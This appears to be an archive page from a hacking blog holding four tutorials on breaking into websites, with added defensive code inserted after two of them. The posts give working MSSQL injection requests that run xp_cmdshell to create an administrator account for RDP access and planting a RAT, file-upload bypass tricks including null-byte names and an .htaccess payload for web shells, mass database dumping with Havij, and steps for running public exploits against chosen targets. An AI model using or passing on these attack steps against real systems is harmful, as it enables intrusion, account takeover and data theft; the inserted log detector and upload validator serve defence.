Archive for the ‘WEbsite Hacking!’ Category

r00ting/RDP A windows Box via MSSQL Injection

April 4, 2011

# Check if the privileges are ‘dbo’ which means database 0wn3r !!
example-
=> www.target.com/news.asp?id=1
Query- www.target.com/news.asp?id=convert(int,(select+user))–
^^ If it shows something Like ‘dbo’ means u can r00t it !!

Next step is

# adding a user account-
for this => www.target.com/news.asp?id=;exec master..xp_cmdshell ‘net user shubham hacker /add’;–
//here uname=shubham and passwd=hacker..u can change it !!!

# Next step is adding to admins group

for this => www.target.com/news.asp?id=;exec master..xp_cmdshell ‘net localgroup administrators shubham /add’;–

Done !! :) )

now open run, type mstsc and hit enter !!
then write the ip of the server !!

Login screen will come..
type uname=Shubham
passwd= hacker
or whatever is urs…

You are in !!! :)
place your RAT or whatever u want…your choice….
THE END !! :)

// credits : cyb3r_shubh4m

Categories: WEbsite Hacking!
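
Seen from the defending side, the three requests in the post above leave recognisable traces in the web server's access log. The following detector is an added example, not part of the original post; the seven-field log layout, the rule names and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Detection rules keyed to the requests described in the post (rule names are made up here).
RULES = {
    "error_based_probe": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "xp_cmdshell_exec": re.compile(r"\bexec(ute)?\b.*\bxp_cmdshell\b", re.I),
    "local_user_add": re.compile(r"\bnet\s+user\s+\S+.*?/add\b", re.I),
    "admin_group_add": re.compile(
        r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
}

# Constructed sample log (assumed layout):
# date time c-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2011-04-04 10:00:01 203.0.113.7 GET /news.asp id=1 200
2011-04-04 10:00:09 198.51.100.23 GET /news.asp id=convert(int,(select+user))-- 500
2011-04-04 10:01:30 198.51.100.23 GET /news.asp id=;exec+master..xp_cmdshell+'net+user+testacct+Passw0rd+/add';-- 200
2011-04-04 10:01:52 198.51.100.23 GET /news.asp id=;exec%2520master..xp_cmdshell%2520'net%2520localgroup%2520administrators%2520testacct%2520/add';-- 200
"""

def normalize(query, max_rounds=3):
    """Undo (possibly repeated) URL encoding and SQL comment padding."""
    for _ in range(max_rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)  # /**/ used as whitespace
    return re.sub(r"\s+", " ", query)

def scan(log_text):
    """Return (client_ip, uri_stem, [matched rule names]) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # not a request line in the assumed layout
        _date, _time, c_ip, _method, stem, query, _status = parts
        matched = [name for name, rx in RULES.items() if rx.search(normalize(query))]
        if matched:
            hits.append((c_ip, stem, matched))
    return hits

if __name__ == "__main__":
    for ip, stem, rules in scan(SAMPLE_LOG):
        print(ip, stem, ",".join(rules))
```

Log matching only tells you it was attempted; the durable fixes are parameterized queries in the page handling `id`, a database login for the web application that is not dbo or sysadmin, and xp_cmdshell left disabled.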

How To Upload A Shell

March 2, 2011

How to Upload a Shell

First of all, when uploading a shell, you MUST be able to problem solve. Some of the techniques I have compiled in this guide aren’t exactly easy for most of you.

I am separating this guide into steps, and sometimes, this won’t always work. In fact, most of the time (If the coder was that bright at all), these techniques will NOT work. So don’t go posting away about it not working for you on one site..

First though, you need some form of upload script. I don’t care if it’s a public upload script, or one off an admin page.

Step 1
First off, try the shell with the regular php extension. I’ve seen this work for admin panels a lot of the time, because the coder doesn’t think anyone but the site admin will be messing with it.. He doesn’t stop to think about security.

Step 2
If step 1 doesn’t work, you’re going to have to try different extensions that also execute php on most servers. These would include .php2, .php3, .php4, .php5, .phtml, .htm (rare cases), .html (rare cases), and no extension at all (rare cases). Also, you can attempt using a null to make it work.

Examples:

Code:
shell.php.jpg%00
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%:
shell.php.jpg;
shell.php.jpg;%00
shell.php.jpg%00;
shell.php.jpg%00:;

Step 3
Now on to step 3, it seems that step 2 didn’t work for you. Sometimes, (now this is occasional), the file extensions it will accept are in the source of the page itself.. this is most common for java uploaders and similar. So to check for this, obviously view the source of the page and check it over for anything that looks like file extensions. If you do find any, you are going to want to use a tool like Firebug (Addon for Firefox), to edit the source to include the extension "php".

Step 4
Next, maybe the script is just blocking the .php, .php2, .php3, etc. scripts from being uploaded. The best way to counteract this is to upload a .htaccess file. Go into notepad or w/e and paste this in:
Code:
AddType application/x-httpd-php .shell .other .jpg .gif .png .mov .pdf
Then upload the shell with one of those extensions. It should execute as php even with the weird extension.

Step 5
Last but not least, is the header modification trick. This one is a little complicated (Will add pics in a min..) To do this, you need something like the Tamper Data addon for Firefox. In this example, I’ll use that addon. What you want to do is after you attempt to send the post data, tamper the data before it sends. Then you will want to scroll through the raw data until you find the header data.. let’s say our header is Application/Data… you would want to change that to something appropriate to the script’s intended purpose, like Image/Jpeg for an image upload script.

That concludes my guide for how to upload a shell for now, will add more to it later, and of course, adding pictures later as well. (Decided not to on this one) As for now, enjoy!
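
Each step of the guide above depends on a specific weakness in the upload handler: a blocklist of extensions, a client-side list, a name containing extra dots or separators, an accepted .htaccess, or trust in the Content-Type header. The following server-side check closes all five; it is an added example, not part of the original guide, and the function names, the allowlist and the naming scheme are assumptions.

```python
import os
import re
import secrets

# Allowlist of extensions and the magic bytes each must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Exactly one dot, a non-empty stem, and no ';', ':', '%' or NUL characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+")

def rejection_reason(client_name, client_content_type, data):
    """Return None if the upload is acceptable, else the reason it is refused."""
    # client_content_type is client-controlled (step 5), so it is never consulted.
    base = os.path.basename(client_name.replace("\\", "/"))
    if not SAFE_NAME.fullmatch(base):
        # Catches double extensions, null/semicolon suffixes and dotfiles (.htaccess).
        return "filename is not a plain name.ext"
    ext = base.rsplit(".", 1)[1].lower()
    sigs = ALLOWED.get(ext)
    if sigs is None:
        # Allowlist, not blocklist: .php3, .phtml and friends never need listing.
        return "extension not on allowlist"
    if not data.startswith(sigs):
        return "content does not match extension"
    return None

def stored_name(client_name):
    """Server-chosen random name; only the (already validated) extension is kept."""
    ext = client_name.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"

if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16  # constructed JPEG-like header
    for name in ("photo.jpg", "shell.phtml", "shell.php.jpg%00", ".htaccess"):
        print(name, "->", rejection_reason(name, "image/jpeg", jpeg) or "accepted")
```

A valid image header can still be followed by script text, so also keep the upload directory outside the document root, or serve it with script handlers and `AllowOverride` disabled.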

Massive Website Hacking

October 9, 2010

Hello friends!!
Herez my brand new short and n00b friendly tutorial on massive website hacking !
Tools required:
1: Reiluk scanner[exploit scanner] :: Get it from HERE

2: Havij: Get It From HERE

Lets start it..
Type a dork in exploit scanner and hit scan sites

Wait till it finishes scanning.. now press test sites

Select a vulnerable site from test sites list and remove the [ ' ] apostrophe
After installing havij open it up and put the above selected vulnerable in havij in target box and hit analyze

Wait till it finishes and hit get tables

Now you have full access to the database, choose a column and press Get data .

FINISH!! Njoy 

Hacking a Website

May 15, 2010

First of all you need a target website. (Google & find one)

Once you’ve got it, plug into this website.

http://www.selfseo.com/find_ip_address_of_a_website.php

Once you’ve done that, it’ll spit out its IP address.

The next thing you need to do is find out whether it is online or offline. (Ping)
Go to http://www.just-ping.com & ping the IP obtained in last step.
Observe the results from ping. (Okay means online)

Now, we need to gather information about the website. (Whois lookup)
Go to http://whois.domaintools.com & plug up the IP or the website.
You’ll see a large amount of information about the website.
Use Google to find even more information about the website.

Once you’re done download, install & open Nmap.
Once you have done that, do a -sT -sV scan of the website.
[That is, put nmap -sT -sV in Nmap’s command bar & scan the website.]
Once done, observe the OS, open ports & services running on the website server.

Once done, you’ll need to find banner of the software.
[Banner: It shows the software & version running on ports.]
Methods depend on the OS of the server.

For WIN VISTA & 7:

You need to download & Open Netcat.
[Because Telnet is disabled in WIN VISTA & 7]

Once done type, nc
Ex: nc 127.0.0.1 21
Once you’ve done that, you’ll get a banner.
This will be displaying all the details of the software running on port.

For other OS:

Open Telnet
[Start > RUN > telnet]

Once done type, O
Ex: O 127.0.0.1 21
Once you’ve done that, you’ll get a banner.
This will be displaying all the details of the software running on port.
If this doesn’t work you can try the first method.

Once you’ve got the banner, you need to search for vulnerability matching with banner.

Exploit databases:

Milw0rm: http://www.milw0rm.com
Security Focus: http://www.securityfocus.com
Osvdb: http://www.osvdb.org
Cve Mitre: http://cve.mitre.org
Metasploit: http://www.metasploit.com

Once you’ve got the matching exploit of the same version software.
[If you haven’t got, try another port.]
You need to edit values, compile & run it.

Most common exploit Coders:

Perl

For perl exploits, Copy the exploit in notepad & save it with .pl extension.
Download & Install, Active Perl: http://www.activestate.com/activeperl
Once done, edit the exploit with notepad & double click to run it.

PHP

For PHP exploits, copy & save it in .php extension.
Download & Install WAMP: http://www.wampserver.com/en/
Once done, edit the exploit with notepad & execute it from CMD.

Python

For python exploits, copy & save it in .py extension.
Download & Install python: http://www.python.org/download
Once done, edit the exploit with notepad & double click to run it.

C/C++

For C/C++ exploits, copy & save it in notepad.
Download & Install Blood Shed. (Google the link)
Once done, edit the exploit, compile & double click to run it.

If your exploit is successful you will get access to server,
You’ll be able to edit every part of the website.
If your exploit wasn’t successful try with different port, services & software.
You can also use Metasploit web to search exploits.

Good Luck !
